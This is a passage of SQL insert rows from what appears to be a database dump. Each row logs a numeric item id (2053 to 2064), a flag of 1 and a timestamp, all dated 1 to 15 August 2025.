(18782, NULL, NULL, 2058, 1, '2025-08-01 23:54:03'),
(18783, NULL, NULL, 2055, 1, '2025-08-02 00:38:48'),
(18784, NULL, NULL, 2055, 1, '2025-08-02 01:05:52'),
(18785, NULL, NULL, 2060, 1, '2025-08-02 01:38:56'),
(18786, NULL, NULL, 2063, 1, '2025-08-02 01:45:49'),
(18787, NULL, NULL, 2058, 1, '2025-08-02 02:04:00'),
(18788, NULL, NULL, 2060, 1, '2025-08-02 02:41:56'),
(18789, NULL, NULL, 2063, 1, '2025-08-02 02:48:40'),
(18790, NULL, NULL, 2060, 1, '2025-08-02 03:11:20'),
(18791, NULL, NULL, 2063, 1, '2025-08-02 03:17:52'),
(18792, NULL, NULL, 2058, 1, '2025-08-02 03:35:51'),
(18793, NULL, NULL, 2064, 1, '2025-08-02 03:54:34'),
(18794, NULL, NULL, 2059, 1, '2025-08-02 04:05:33'),
(18795, NULL, NULL, 2062, 1, '2025-08-02 04:13:51'),
(18796, NULL, NULL, 2055, 1, '2025-08-02 04:15:40'),
(18797, NULL, NULL, 2060, 1, '2025-08-02 04:24:35'),
(18798, NULL, NULL, 2064, 1, '2025-08-02 04:35:46'),
(18799, NULL, NULL, 2063, 1, '2025-08-02 04:46:34'),
(18800, NULL, NULL, 2061, 1, '2025-08-02 05:22:57'),
(18801, NULL, NULL, 2060, 1, '2025-08-02 05:23:18'),
(18802, NULL, NULL, 2063, 1, '2025-08-02 05:43:03'),
(18803, NULL, NULL, 2062, 1, '2025-08-02 05:58:05'),
(18804, NULL, NULL, 2054, 1, '2025-08-02 07:11:12'),
(18805, NULL, NULL, 2059, 1, '2025-08-02 07:27:34'),
(18806, NULL, NULL, 2064, 1, '2025-08-02 07:40:13'),
(18807, NULL, NULL, 2060, 1, '2025-08-02 08:04:01'),
(18808, NULL, NULL, 2060, 1, '2025-08-02 08:06:05'),
(18809, NULL, NULL, 2063, 1, '2025-08-02 08:13:34'),
(18810, NULL, NULL, 2058, 1, '2025-08-02 08:33:51'),
(18811, NULL, NULL, 2064, 1, '2025-08-02 09:01:56'),
(18812, NULL, NULL, 2055, 1, '2025-08-02 09:15:00'),
(18813, NULL, NULL, 2060, 1, '2025-08-02 09:45:05'),
(18814, NULL, NULL, 2063, 1, '2025-08-02 09:52:55'),
(18815, NULL, NULL, 2058, 1, '2025-08-02 10:14:19'),
(18816, NULL, NULL, 2055, 1, '2025-08-02 10:57:28'),
(18817, NULL, NULL, 2064, 1, '2025-08-02 11:31:11'),
(18818, NULL, NULL, 2061, 1, '2025-08-02 12:10:23'),
(18819, NULL, NULL, 2062, 1, '2025-08-02 12:48:16'),
(18820, NULL, NULL, 2054, 1, '2025-08-02 14:09:12'),
(18821, NULL, NULL, 2062, 1, '2025-08-02 14:18:58'),
(18822, NULL, NULL, 2059, 1, '2025-08-02 14:26:46'),
(18823, NULL, NULL, 2064, 1, '2025-08-02 14:40:56'),
(18824, NULL, NULL, 2061, 1, '2025-08-02 15:00:27'),
(18825, NULL, NULL, 2064, 1, '2025-08-02 16:47:09'),
(18826, NULL, NULL, 2061, 1, '2025-08-02 17:00:40'),
(18827, NULL, NULL, 2060, 1, '2025-08-02 18:46:31'),
(18828, NULL, NULL, 2063, 1, '2025-08-02 18:53:17'),
(18829, NULL, NULL, 2060, 1, '2025-08-02 19:19:24'),
(18830, NULL, NULL, 2060, 1, '2025-08-02 19:39:31'),
(18831, NULL, NULL, 2063, 1, '2025-08-02 19:54:31'),
(18832, NULL, NULL, 2058, 1, '2025-08-02 20:34:31'),
(18833, NULL, NULL, 2059, 1, '2025-08-02 21:13:24'),
(18834, NULL, NULL, 2055, 1, '2025-08-02 21:56:00'),
(18835, NULL, NULL, 2064, 1, '2025-08-02 22:07:03'),
(18836, NULL, NULL, 2061, 1, '2025-08-02 23:40:46'),
(18837, NULL, NULL, 2063, 1, '2025-08-02 23:40:50'),
(18838, NULL, NULL, 2062, 1, '2025-08-02 23:40:54'),
(18839, NULL, NULL, 2061, 1, '2025-08-03 00:10:18'),
(18840, NULL, NULL, 2062, 1, '2025-08-03 01:20:35'),
(18841, NULL, NULL, 2060, 1, '2025-08-03 02:49:41'),
(18842, NULL, NULL, 2063, 1, '2025-08-03 02:57:29'),
(18843, NULL, NULL, 2060, 1, '2025-08-03 03:30:33'),
(18844, NULL, NULL, 2063, 1, '2025-08-03 03:38:43'),
(18845, NULL, NULL, 2058, 1, '2025-08-03 04:00:49'),
(18846, NULL, NULL, 2055, 1, '2025-08-03 04:46:17'),
(18847, NULL, NULL, 2064, 1, '2025-08-03 05:43:00'),
(18848, NULL, NULL, 2061, 1, '2025-08-03 06:03:10'),
(18849, NULL, NULL, 2062, 1, '2025-08-03 06:43:45'),
(18850, NULL, NULL, 2054, 1, '2025-08-03 08:10:11'),
(18851, NULL, NULL, 2059, 1, '2025-08-03 08:29:11'),
(18852, NULL, NULL, 2064, 1, '2025-08-03 08:44:08'),
(18853, NULL, NULL, 2064, 1, '2025-08-03 12:03:23'),
(18854, NULL, NULL, 2055, 1, '2025-08-03 13:41:46'),
(18855, NULL, NULL, 2062, 1, '2025-08-03 14:27:38'),
(18856, NULL, NULL, 2058, 1, '2025-08-03 17:18:46'),
(18857, NULL, NULL, 2060, 1, '2025-08-03 18:15:19'),
(18858, NULL, NULL, 2060, 1, '2025-08-03 19:08:26'),
(18859, NULL, NULL, 2059, 1, '2025-08-03 19:41:27'),
(18860, NULL, NULL, 2058, 1, '2025-08-03 20:44:52'),
(18861, NULL, NULL, 2064, 1, '2025-08-03 20:58:02'),
(18862, NULL, NULL, 2061, 1, '2025-08-03 21:26:01'),
(18863, NULL, NULL, 2061, 1, '2025-08-03 23:42:22'),
(18864, NULL, NULL, 2064, 1, '2025-08-04 05:22:12'),
(18865, NULL, NULL, 2060, 1, '2025-08-04 05:54:35'),
(18866, NULL, NULL, 2059, 1, '2025-08-04 07:01:47'),
(18867, NULL, NULL, 2060, 1, '2025-08-04 07:01:54'),
(18868, NULL, NULL, 2063, 1, '2025-08-04 07:06:34'),
(18869, NULL, NULL, 2060, 1, '2025-08-04 07:16:13'),
(18870, NULL, NULL, 2064, 1, '2025-08-04 09:16:21'),
(18871, NULL, NULL, 2062, 1, '2025-08-04 09:16:37'),
(18872, NULL, NULL, 2063, 1, '2025-08-04 09:16:53'),
(18873, NULL, NULL, 2061, 1, '2025-08-04 09:16:58'),
(18874, NULL, NULL, 2059, 1, '2025-08-04 09:17:08'),
(18875, NULL, NULL, 2058, 1, '2025-08-04 09:17:15'),
(18876, NULL, NULL, 2055, 1, '2025-08-04 09:17:21'),
(18877, NULL, NULL, 2054, 1, '2025-08-04 09:17:26'),
(18878, NULL, NULL, 2060, 1, '2025-08-04 09:17:32'),
(18879, NULL, NULL, 2061, 1, '2025-08-04 09:36:52'),
(18880, NULL, NULL, 2053, 1, '2025-08-04 11:13:17'),
(18881, NULL, NULL, 2055, 1, '2025-08-04 12:05:31'),
(18882, NULL, NULL, 2053, 1, '2025-08-04 14:23:08'),
(18883, NULL, NULL, 2062, 1, '2025-08-04 15:59:46'),
(18884, NULL, NULL, 2060, 1, '2025-08-04 19:25:28'),
(18885, NULL, NULL, 2060, 1, '2025-08-04 19:53:50'),
(18886, NULL, NULL, 2054, 1, '2025-08-04 21:57:06'),
(18887, NULL, NULL, 2054, 1, '2025-08-04 22:07:03'),
(18888, NULL, NULL, 2059, 1, '2025-08-04 22:17:15'),
(18889, NULL, NULL, 2058, 1, '2025-08-04 22:52:30'),
(18890, NULL, NULL, 2061, 1, '2025-08-04 23:14:57'),
(18891, NULL, NULL, 2064, 1, '2025-08-05 03:02:58'),
(18892, NULL, NULL, 2053, 1, '2025-08-05 05:20:58'),
(18893, NULL, NULL, 2053, 1, '2025-08-05 06:37:36'),
(18894, NULL, NULL, 2054, 1, '2025-08-05 07:02:03'),
(18895, NULL, NULL, 2055, 1, '2025-08-05 07:02:05'),
(18896, NULL, NULL, 2064, 1, '2025-08-05 07:02:11'),
(18897, NULL, NULL, 2063, 1, '2025-08-05 07:02:13'),
(18898, NULL, NULL, 2062, 1, '2025-08-05 07:02:15'),
(18899, NULL, NULL, 2060, 1, '2025-08-05 07:02:17'),
(18900, NULL, NULL, 2059, 1, '2025-08-05 07:02:19'),
(18901, NULL, NULL, 2061, 1, '2025-08-05 07:02:21'),
(18902, NULL, NULL, 2058, 1, '2025-08-05 07:02:23'),
(18903, NULL, NULL, 2058, 1, '2025-08-05 08:32:41'),
(18904, NULL, NULL, 2063, 1, '2025-08-05 09:11:43'),
(18905, NULL, NULL, 2062, 1, '2025-08-05 09:18:51'),
(18906, NULL, NULL, 2060, 1, '2025-08-05 09:24:29'),
(18907, NULL, NULL, 2058, 1, '2025-08-05 09:26:15'),
(18908, NULL, NULL, 2061, 1, '2025-08-05 10:45:45'),
(18909, NULL, NULL, 2060, 1, '2025-08-05 12:08:02'),
(18910, NULL, NULL, 2062, 1, '2025-08-05 12:22:47'),
(18911, NULL, NULL, 2062, 1, '2025-08-05 14:33:07'),
(18912, NULL, NULL, 2060, 1, '2025-08-05 18:16:02'),
(18913, NULL, NULL, 2058, 1, '2025-08-05 20:23:30'),
(18914, NULL, NULL, 2054, 1, '2025-08-05 20:23:34'),
(18915, NULL, NULL, 2059, 1, '2025-08-05 23:56:35'),
(18916, NULL, NULL, 2062, 1, '2025-08-06 00:33:52'),
(18917, NULL, NULL, 2053, 1, '2025-08-06 00:38:27'),
(18918, NULL, NULL, 2061, 1, '2025-08-06 03:27:33'),
(18919, NULL, NULL, 2061, 1, '2025-08-06 03:30:12'),
(18920, NULL, NULL, 2058, 1, '2025-08-06 08:46:09'),
(18921, NULL, NULL, 2062, 1, '2025-08-06 13:05:03'),
(18922, NULL, NULL, 2053, 1, '2025-08-06 13:05:59'),
(18923, NULL, NULL, 2062, 1, '2025-08-06 13:08:28'),
(18924, NULL, NULL, 2061, 1, '2025-08-06 13:09:44'),
(18925, NULL, NULL, 2061, 1, '2025-08-06 13:10:19'),
(18926, NULL, NULL, 2063, 1, '2025-08-06 13:24:07'),
(18927, NULL, NULL, 2063, 1, '2025-08-06 13:24:52'),
(18928, NULL, NULL, 2060, 1, '2025-08-06 13:45:51'),
(18929, NULL, NULL, 2059, 1, '2025-08-06 13:48:40'),
(18930, NULL, NULL, 2059, 1, '2025-08-06 13:51:15'),
(18931, NULL, NULL, 2062, 1, '2025-08-06 14:21:19'),
(18932, NULL, NULL, 2053, 1, '2025-08-06 14:28:05'),
(18933, NULL, NULL, 2054, 1, '2025-08-06 15:11:25'),
(18934, NULL, NULL, 2064, 1, '2025-08-06 16:11:21'),
(18935, NULL, NULL, 2060, 1, '2025-08-06 16:32:33'),
(18936, NULL, NULL, 2061, 1, '2025-08-06 16:50:28'),
(18937, NULL, NULL, 2058, 1, '2025-08-06 16:59:28'),
(18938, NULL, NULL, 2055, 1, '2025-08-06 17:10:30'),
(18939, NULL, NULL, 2054, 1, '2025-08-06 17:18:33'),
(18940, NULL, NULL, 2060, 1, '2025-08-06 18:41:08'),
(18941, NULL, NULL, 2053, 1, '2025-08-06 19:26:51'),
(18942, NULL, NULL, 2060, 1, '2025-08-06 23:32:23'),
(18943, NULL, NULL, 2064, 1, '2025-08-06 23:49:10'),
(18944, NULL, NULL, 2064, 1, '2025-08-07 00:33:46'),
(18945, NULL, NULL, 2054, 1, '2025-08-07 00:44:09'),
(18946, NULL, NULL, 2063, 1, '2025-08-07 00:44:30'),
(18947, NULL, NULL, 2060, 1, '2025-08-07 01:17:42'),
(18948, NULL, NULL, 2062, 1, '2025-08-07 01:32:01'),
(18949, NULL, NULL, 2063, 1, '2025-08-07 01:43:25'),
(18950, NULL, NULL, 2061, 1, '2025-08-07 02:09:02'),
(18951, NULL, NULL, 2064, 1, '2025-08-07 02:13:10'),
(18952, NULL, NULL, 2055, 1, '2025-08-07 03:36:29'),
(18953, NULL, NULL, 2060, 1, '2025-08-07 03:44:23'),
(18954, NULL, NULL, 2064, 1, '2025-08-07 03:50:53'),
(18955, NULL, NULL, 2061, 1, '2025-08-07 05:27:47'),
(18956, NULL, NULL, 2059, 1, '2025-08-07 06:42:39'),
(18957, NULL, NULL, 2059, 1, '2025-08-07 07:08:26'),
(18958, NULL, NULL, 2053, 1, '2025-08-07 07:59:50'),
(18959, NULL, NULL, 2053, 1, '2025-08-07 14:18:43'),
(18960, NULL, NULL, 2062, 1, '2025-08-07 15:07:38'),
(18961, NULL, NULL, 2059, 1, '2025-08-07 19:02:05'),
(18962, NULL, NULL, 2053, 1, '2025-08-07 20:48:56'),
(18963, NULL, NULL, 2062, 1, '2025-08-07 20:56:56'),
(18964, NULL, NULL, 2061, 1, '2025-08-07 21:37:18'),
(18965, NULL, NULL, 2060, 1, '2025-08-08 01:37:54'),
(18966, NULL, NULL, 2053, 1, '2025-08-08 01:58:32'),
(18967, NULL, NULL, 2053, 1, '2025-08-08 05:26:41'),
(18968, NULL, NULL, 2063, 1, '2025-08-08 09:31:58'),
(18969, NULL, NULL, 2062, 1, '2025-08-08 14:53:50'),
(18970, NULL, NULL, 2060, 1, '2025-08-08 20:55:13'),
(18971, NULL, NULL, 2058, 1, '2025-08-08 20:55:19'),
(18972, NULL, NULL, 2061, 1, '2025-08-08 20:55:44'),
(18973, NULL, NULL, 2063, 1, '2025-08-08 20:55:47'),
(18974, NULL, NULL, 2059, 1, '2025-08-08 20:56:10'),
(18975, NULL, NULL, 2064, 1, '2025-08-08 20:56:19'),
(18976, NULL, NULL, 2062, 1, '2025-08-08 20:56:21'),
(18977, NULL, NULL, 2054, 1, '2025-08-08 20:56:22'),
(18978, NULL, NULL, 2055, 1, '2025-08-08 20:57:58'),
(18979, NULL, NULL, 2053, 1, '2025-08-08 20:58:34'),
(18980, NULL, NULL, 2061, 1, '2025-08-08 21:56:58'),
(18981, NULL, NULL, 2058, 1, '2025-08-08 23:50:44'),
(18982, NULL, NULL, 2060, 1, '2025-08-09 01:31:31'),
(18983, NULL, NULL, 2062, 1, '2025-08-09 01:52:49'),
(18984, NULL, NULL, 2063, 1, '2025-08-09 01:52:57'),
(18985, NULL, NULL, 2061, 1, '2025-08-09 01:53:01'),
(18986, NULL, NULL, 2064, 1, '2025-08-09 03:08:35'),
(18987, NULL, NULL, 2062, 1, '2025-08-09 04:36:18'),
(18988, NULL, NULL, 2053, 1, '2025-08-09 05:30:23'),
(18989, NULL, NULL, 2064, 1, '2025-08-09 09:07:27'),
(18990, NULL, NULL, 2060, 1, '2025-08-09 09:43:38'),
(18991, NULL, NULL, 2061, 1, '2025-08-09 10:13:33'),
(18992, NULL, NULL, 2053, 1, '2025-08-09 10:57:05'),
(18993, NULL, NULL, 2061, 1, '2025-08-09 12:07:39'),
(18994, NULL, NULL, 2053, 1, '2025-08-09 12:33:08'),
(18995, NULL, NULL, 2062, 1, '2025-08-09 14:30:06'),
(18996, NULL, NULL, 2064, 1, '2025-08-09 16:36:38'),
(18997, NULL, NULL, 2053, 1, '2025-08-09 16:49:10'),
(18998, NULL, NULL, 2061, 1, '2025-08-09 17:14:21'),
(18999, NULL, NULL, 2055, 1, '2025-08-09 21:50:33'),
(19000, NULL, NULL, 2058, 1, '2025-08-09 21:50:36'),
(19001, NULL, NULL, 2059, 1, '2025-08-09 23:07:24'),
(19002, NULL, NULL, 2054, 1, '2025-08-09 23:09:16'),
(19003, NULL, NULL, 2059, 1, '2025-08-10 04:45:11'),
(19004, NULL, NULL, 2061, 1, '2025-08-10 07:43:00'),
(19005, NULL, NULL, 2060, 1, '2025-08-10 07:47:37'),
(19006, NULL, NULL, 2060, 1, '2025-08-10 08:59:16'),
(19007, NULL, NULL, 2063, 1, '2025-08-10 08:59:26'),
(19008, NULL, NULL, 2062, 1, '2025-08-10 14:19:52'),
(19009, NULL, NULL, 2053, 1, '2025-08-10 15:53:34'),
(19010, NULL, NULL, 2061, 1, '2025-08-10 16:34:39'),
(19011, NULL, NULL, 2059, 1, '2025-08-10 21:57:23'),
(19012, NULL, NULL, 2062, 1, '2025-08-10 22:49:40'),
(19013, NULL, NULL, 2060, 1, '2025-08-11 00:28:19'),
(19014, NULL, NULL, 2061, 1, '2025-08-11 00:48:25'),
(19015, NULL, NULL, 2053, 1, '2025-08-11 01:20:08'),
(19016, NULL, NULL, 2059, 1, '2025-08-11 01:41:56'),
(19017, NULL, NULL, 2064, 1, '2025-08-11 04:48:30'),
(19018, NULL, NULL, 2055, 1, '2025-08-11 05:59:34'),
(19019, NULL, NULL, 2059, 1, '2025-08-11 06:46:26'),
(19020, NULL, NULL, 2060, 1, '2025-08-11 06:46:29'),
(19021, NULL, NULL, 2059, 1, '2025-08-11 10:36:45'),
(19022, NULL, NULL, 2055, 1, '2025-08-11 12:12:58'),
(19023, NULL, NULL, 2061, 1, '2025-08-11 13:52:30'),
(19024, NULL, NULL, 2062, 1, '2025-08-11 14:55:24'),
(19025, NULL, NULL, 2054, 1, '2025-08-11 15:22:52'),
(19026, NULL, NULL, 2054, 1, '2025-08-11 16:29:47'),
(19027, NULL, NULL, 2059, 1, '2025-08-11 18:32:41'),
(19028, NULL, NULL, 2054, 1, '2025-08-11 21:46:39'),
(19029, NULL, NULL, 2061, 1, '2025-08-11 22:09:19'),
(19030, NULL, NULL, 2058, 1, '2025-08-11 22:21:03'),
(19031, NULL, NULL, 2055, 1, '2025-08-11 22:32:47'),
(19032, NULL, NULL, 2054, 1, '2025-08-11 22:41:21'),
(19033, NULL, NULL, 2064, 1, '2025-08-11 22:53:25'),
(19034, NULL, NULL, 2059, 1, '2025-08-11 23:02:40'),
(19035, NULL, NULL, 2061, 1, '2025-08-11 23:12:45'),
(19036, NULL, NULL, 2060, 1, '2025-08-11 23:50:08'),
(19037, NULL, NULL, 2061, 1, '2025-08-12 01:18:36'),
(19038, NULL, NULL, 2064, 1, '2025-08-12 03:16:47'),
(19039, NULL, NULL, 2055, 1, '2025-08-12 03:31:45'),
(19040, NULL, NULL, 2054, 1, '2025-08-12 03:38:36'),
(19041, NULL, NULL, 2064, 1, '2025-08-12 05:38:55'),
(19042, NULL, NULL, 2064, 1, '2025-08-12 05:51:30'),
(19043, NULL, NULL, 2063, 1, '2025-08-12 06:02:30'),
(19044, NULL, NULL, 2062, 1, '2025-08-12 06:21:40'),
(19045, NULL, NULL, 2060, 1, '2025-08-12 07:28:52'),
(19046, NULL, NULL, 2060, 1, '2025-08-12 08:35:25'),
(19047, NULL, NULL, 2053, 1, '2025-08-12 08:36:57'),
(19048, NULL, NULL, 2058, 1, '2025-08-12 08:40:05'),
(19049, NULL, NULL, 2058, 1, '2025-08-12 09:01:26'),
(19050, NULL, NULL, 2054, 1, '2025-08-12 13:06:31'),
(19051, NULL, NULL, 2061, 1, '2025-08-12 13:27:42'),
(19052, NULL, NULL, 2062, 1, '2025-08-12 14:19:52'),
(19053, NULL, NULL, 2053, 1, '2025-08-12 15:07:13'),
(19054, NULL, NULL, 2061, 1, '2025-08-12 15:14:12'),
(19055, NULL, NULL, 2060, 1, '2025-08-12 19:03:34'),
(19056, NULL, NULL, 2058, 1, '2025-08-12 19:44:01'),
(19057, NULL, NULL, 2054, 1, '2025-08-12 19:44:09'),
(19058, NULL, NULL, 2053, 1, '2025-08-12 21:20:55'),
(19059, NULL, NULL, 2059, 1, '2025-08-13 02:57:37'),
(19060, NULL, NULL, 2060, 1, '2025-08-13 05:54:44'),
(19061, NULL, NULL, 2062, 1, '2025-08-13 06:08:14'),
(19062, NULL, NULL, 2060, 1, '2025-08-13 13:46:19'),
(19063, NULL, NULL, 2062, 1, '2025-08-13 14:28:49'),
(19064, NULL, NULL, 2060, 1, '2025-08-13 17:55:49'),
(19065, NULL, NULL, 2060, 1, '2025-08-13 18:26:12'),
(19066, NULL, NULL, 2061, 1, '2025-08-13 21:37:53'),
(19067, NULL, NULL, 2061, 1, '2025-08-14 00:54:08'),
(19068, NULL, NULL, 2053, 1, '2025-08-14 01:50:41'),
(19069, NULL, NULL, 2053, 1, '2025-08-14 04:51:17'),
(19070, NULL, NULL, 2064, 1, '2025-08-14 06:26:29'),
(19071, NULL, NULL, 2053, 1, '2025-08-14 09:10:03'),
(19072, NULL, NULL, 2064, 1, '2025-08-14 10:52:38'),
(19073, NULL, NULL, 2063, 1, '2025-08-14 10:57:09'),
(19074, NULL, NULL, 2061, 1, '2025-08-14 10:57:14'),
(19075, NULL, NULL, 2059, 1, '2025-08-14 10:57:23'),
(19076, NULL, NULL, 2058, 1, '2025-08-14 10:57:28'),
(19077, NULL, NULL, 2055, 1, '2025-08-14 10:57:39'),
(19078, NULL, NULL, 2054, 1, '2025-08-14 10:57:51'),
(19079, NULL, NULL, 2060, 1, '2025-08-14 10:58:11'),
(19080, NULL, NULL, 2064, 1, '2025-08-14 11:40:30'),
(19081, NULL, NULL, 2062, 1, '2025-08-14 11:40:45'),
(19082, NULL, NULL, 2063, 1, '2025-08-14 11:41:02'),
(19083, NULL, NULL, 2061, 1, '2025-08-14 11:41:08'),
(19084, NULL, NULL, 2059, 1, '2025-08-14 11:41:13'),
(19085, NULL, NULL, 2058, 1, '2025-08-14 11:41:18'),
(19086, NULL, NULL, 2055, 1, '2025-08-14 11:41:22'),
(19087, NULL, NULL, 2054, 1, '2025-08-14 11:41:57'),
(19088, NULL, NULL, 2060, 1, '2025-08-14 11:42:16'),
(19089, NULL, NULL, 2053, 1, '2025-08-14 12:02:33'),
(19090, NULL, NULL, 2064, 1, '2025-08-14 12:37:05'),
(19091, NULL, NULL, 2062, 1, '2025-08-14 12:38:44'),
(19092, NULL, NULL, 2063, 1, '2025-08-14 12:39:12'),
(19093, NULL, NULL, 2061, 1, '2025-08-14 12:40:16'),
(19094, NULL, NULL, 2059, 1, '2025-08-14 12:40:35'),
(19095, NULL, NULL, 2058, 1, '2025-08-14 12:40:55'),
(19096, NULL, NULL, 2055, 1, '2025-08-14 12:41:02'),
(19097, NULL, NULL, 2054, 1, '2025-08-14 12:41:11'),
(19098, NULL, NULL, 2060, 1, '2025-08-14 12:41:18'),
(19099, NULL, NULL, 2061, 1, '2025-08-14 13:09:45'),
(19100, NULL, NULL, 2063, 1, '2025-08-14 13:11:10'),
(19101, NULL, NULL, 2064, 1, '2025-08-14 13:12:32'),
(19102, NULL, NULL, 2062, 1, '2025-08-14 13:35:46'),
(19103, NULL, NULL, 2064, 1, '2025-08-14 13:36:31'),
(19104, NULL, NULL, 2062, 1, '2025-08-14 13:37:05'),
(19105, NULL, NULL, 2058, 1, '2025-08-14 13:39:51'),
(19106, NULL, NULL, 2055, 1, '2025-08-14 13:40:53'),
(19107, NULL, NULL, 2058, 1, '2025-08-14 13:41:23'),
(19108, NULL, NULL, 2063, 1, '2025-08-14 14:37:01'),
(19109, NULL, NULL, 2064, 1, '2025-08-14 14:38:56'),
(19110, NULL, NULL, 2054, 1, '2025-08-14 14:58:17'),
(19111, NULL, NULL, 2062, 1, '2025-08-14 14:59:27'),
(19112, NULL, NULL, 2060, 1, '2025-08-14 15:04:51'),
(19113, NULL, NULL, 2059, 1, '2025-08-14 15:31:33'),
(19114, NULL, NULL, 2059, 1, '2025-08-14 15:32:57'),
(19115, NULL, NULL, 2064, 1, '2025-08-14 15:48:42'),
(19116, NULL, NULL, 2060, 1, '2025-08-14 15:49:38'),
(19117, NULL, NULL, 2061, 1, '2025-08-14 16:03:31'),
(19118, NULL, NULL, 2061, 1, '2025-08-14 16:04:44'),
(19119, NULL, NULL, 2064, 1, '2025-08-14 16:28:15'),
(19120, NULL, NULL, 2062, 1, '2025-08-14 16:28:32'),
(19121, NULL, NULL, 2063, 1, '2025-08-14 16:29:00'),
(19122, NULL, NULL, 2061, 1, '2025-08-14 16:29:05'),
(19123, NULL, NULL, 2059, 1, '2025-08-14 16:29:41'),
(19124, NULL, NULL, 2058, 1, '2025-08-14 16:29:46'),
(19125, NULL, NULL, 2055, 1, '2025-08-14 16:29:51'),
(19126, NULL, NULL, 2054, 1, '2025-08-14 16:29:57'),
(19127, NULL, NULL, 2060, 1, '2025-08-14 16:30:03'),
(19128, NULL, NULL, 2058, 1, '2025-08-14 16:54:31'),
(19129, NULL, NULL, 2059, 1, '2025-08-14 18:33:55'),
(19130, NULL, NULL, 2064, 1, '2025-08-14 18:44:18'),
(19131, NULL, NULL, 2062, 1, '2025-08-14 18:44:41'),
(19132, NULL, NULL, 2063, 1, '2025-08-14 18:45:03'),
(19133, NULL, NULL, 2061, 1, '2025-08-14 18:45:12'),
(19134, NULL, NULL, 2059, 1, '2025-08-14 18:45:18'),
(19135, NULL, NULL, 2058, 1, '2025-08-14 18:45:27'),
(19136, NULL, NULL, 2055, 1, '2025-08-14 18:45:37'),
(19137, NULL, NULL, 2054, 1, '2025-08-14 18:45:42'),
(19138, NULL, NULL, 2060, 1, '2025-08-14 18:45:52'),
(19139, NULL, NULL, 2061, 1, '2025-08-14 18:52:19'),
(19140, NULL, NULL, 2064, 1, '2025-08-14 19:48:47'),
(19141, NULL, NULL, 2064, 1, '2025-08-14 22:04:35'),
(19142, NULL, NULL, 2064, 1, '2025-08-14 22:42:56'),
(19143, NULL, NULL, 2062, 1, '2025-08-14 22:43:21'),
(19144, NULL, NULL, 2063, 1, '2025-08-14 22:43:49'),
(19145, NULL, NULL, 2061, 1, '2025-08-14 22:43:56'),
(19146, NULL, NULL, 2059, 1, '2025-08-14 22:44:06'),
(19147, NULL, NULL, 2058, 1, '2025-08-14 22:44:15'),
(19148, NULL, NULL, 2055, 1, '2025-08-14 22:44:25'),
(19149, NULL, NULL, 2054, 1, '2025-08-14 22:44:33'),
(19150, NULL, NULL, 2060, 1, '2025-08-14 22:44:43'),
(19151, NULL, NULL, 2060, 1, '2025-08-14 23:43:48'),
(19152, NULL, NULL, 2053, 1, '2025-08-15 01:38:47'),
(19153, NULL, NULL, 2061, 1, '2025-08-15 04:17:18'),
(19154, NULL, NULL, 2064, 1, '2025-08-15 08:49:36'),
(19155, NULL, NULL, 2062, 1, '2025-08-15 08:50:07'),
(19156, NULL, NULL, 2063, 1, '2025-08-15 08:50:26'),
(19157, NULL, NULL, 2061, 1, '2025-08-15 08:50:33'),
(19158, NULL, NULL, 2059, 1, '2025-08-15 08:50:41'),
(19159, NULL, NULL, 2058, 1, '2025-08-15 08:50:47'),
(19160, NULL, NULL, 2055, 1, '2025-08-15 08:50:52'),
(19161, NULL, NULL, 2054, 1, '2025-08-15 08:50:57'),
(19162, NULL, NULL, 2060, 1, '2025-08-15 08:51:05'),
(19163, NULL, NULL, 2053, 1, '2025-08-15 10:38:50'),
(19164, NULL, NULL, 2064, 1, '2025-08-15 10:40:46'),
(19165, NULL, NULL, 2062, 1, '2025-08-15 10:41:16'),
(19166, NULL, NULL, 2063, 1, '2025-08-15 10:41:29'),
(19167, NULL, NULL, 2061, 1, '2025-08-15 10:41:34'),
(19168, NULL, NULL, 2059, 1, '2025-08-15 10:41:39'),
(19169, NULL, NULL, 2058, 1, '2025-08-15 10:41:44'),
(19170, NULL, NULL, 2055, 1, '2025-08-15 10:41:48'),
(19171, NULL, NULL, 2054, 1, '2025-08-15 10:41:58'),
(19172, NULL, NULL, 2060, 1, '2025-08-15 10:42:03'),
(19173, NULL, NULL, 2064, 1, '2025-08-15 12:03:24'),
(19174, NULL, NULL, 2062, 1, '2025-08-15 12:03:44'),
(19175, NULL, NULL, 2063, 1, '2025-08-15 12:04:15'),
(19176, NULL, NULL, 2061, 1, '2025-08-15 12:04:27'),
(19177, NULL, NULL, 2059, 1, '2025-08-15 12:04:33'),
(19178, NULL, NULL, 2058, 1, '2025-08-15 12:04:41'),
(19179, NULL, NULL, 2055, 1, '2025-08-15 12:04:52'),
(19180, NULL, NULL, 2054, 1, '2025-08-15 12:05:03'),
(19181, NULL, NULL, 2060, 1, '2025-08-15 12:05:17'),
(19182, NULL, NULL, 2055, 1, '2025-08-15 13:18:34'),
(19183, NULL, NULL, 2062, 1, '2025-08-15 14:24:43'),
(19184, NULL, NULL, 2060, 1, '2025-08-15 14:43:26'),
(19185, NULL, NULL, 2063, 1, '2025-08-15 14:50:00'),
(19186, NULL, NULL, 2058, 1, '2025-08-15 15:06:31'),
(19187, NULL, NULL, 2061, 1, '2025-08-15 15:29:10'),
(19188, NULL, NULL, 2060, 1, '2025-08-15 15:30:42'),
(19189, NULL, NULL, 2063, 1, '2025-08-15 15:37:30'),
(19190, NULL, NULL, 2058, 1, '2025-08-15 15:55:29'),
(19191, NULL, NULL, 2061, 1, '2025-08-15 15:58:37'),
(19192, NULL, NULL, 2054, 1, '2025-08-15 16:01:39'),
(19193, NULL, NULL, 2061, 1, '2025-08-15 16:23:17'),
(19194, NULL, NULL, 2055, 1, '2025-08-15 16:27:56'),
(19195, NULL, NULL, 2060, 1, '2025-08-15 16:52:44'),
(19196, NULL, NULL, 2061, 1, '2025-08-15 16:59:08'),
(19197, NULL, NULL, 2063, 1, '2025-08-15 16:59:39'),
(19198, NULL, NULL, 2061, 1, '2025-08-15 17:05:27'),
(19199, NULL, NULL, 2060, 1, '2025-08-15 17:37:13'),
(19200, NULL, NULL, 2061, 1, '2025-08-15 17:37:32'),
(19201, NULL, NULL, 2055, 1, '2025-08-15 17:39:04'),
(19202, NULL, NULL, 2063, 1, '2025-08-15 17:43:31'),
(19203, NULL, NULL, 2058, 1, '2025-08-15 17:59:49'),
(19204, NULL, NULL, 2061, 1, '2025-08-15 18:00:44'),
(19205, NULL, NULL, 2061, 1, '2025-08-15 18:09:40'),
(19206, NULL, NULL, 2055, 1, '2025-08-15 18:28:40'),
(19207, NULL, NULL, 2061, 1, '2025-08-15 18:48:37'),
(19208, NULL, NULL, 2064, 1, '2025-08-15 19:23:03'),
(19209, NULL, NULL, 2062, 1, '2025-08-15 19:23:30'),
